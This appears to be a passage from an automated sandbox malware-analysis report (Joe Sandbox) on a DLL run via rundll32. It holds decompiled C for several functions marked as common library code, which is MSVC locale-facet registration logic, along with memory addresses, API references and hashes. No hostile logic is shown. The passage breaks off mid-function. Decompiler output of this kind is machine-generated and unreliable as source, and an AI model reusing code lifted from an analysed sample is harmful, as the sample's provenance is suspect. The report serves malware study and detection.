                          • Instruction ID: 5c9b8f76120b1df9aeff51c5084e6e907daec447d121e33e8a8055deb2c3d2f3
                          • Opcode Fuzzy Hash: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
                          • Instruction Fuzzy Hash: BA11E37591051D8BCF00DBE0C894AEEB77BAF44715F140909E510AB2D0DFB4AA40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BA8A, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E21BA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E21C1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E21C229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21C295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e26c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21D028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}















                          0x6e21ba8a
                          0x6e21ba8a
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21babb
                          0x6e21bac0
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BA91
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BA9B
                          • int.LIBCPMT ref: 6E21BAB2
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E21BAD5
                          • std::_Facet_Register.LIBCPMT ref: 6E21BAEC
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BB0C
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BB2A
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
                          • Instruction ID: 734de158d0fa54177c58d4227b11f51af845ccd0e6bbc089bfe5059c94ce5df3
                          • Opcode Fuzzy Hash: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
                          • Instruction Fuzzy Hash: 1911E37A90451ECBCF04DBE4C894AFDB7BBAF45B14F180919E5116B390DBB49A40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B9E4, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E21C120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E21C1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E21C229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21C295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21D028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}


















                          0x6e21b9e4
                          0x6e21b9e4
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba15
                          0x6e21ba1a
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B9EB
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B9F5
                          • int.LIBCPMT ref: 6E21BA0C
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E21BA2F
                          • std::_Facet_Register.LIBCPMT ref: 6E21BA46
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BA66
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BA84
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
                          • Instruction ID: c1249fca7f6cc80b9db5a7902068ea75e5d80f79faff2a3094615eaa3eb0b955
                          • Opcode Fuzzy Hash: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
                          • Instruction Fuzzy Hash: 33113279D0451ECBCF00DBE4C898AEDB7BBAF44B04F140919E510AB390CBB49B41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F9F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E211471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E2114EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E211558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E2115C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E206FD3(__eflags, _t227);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e2c6dcc = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
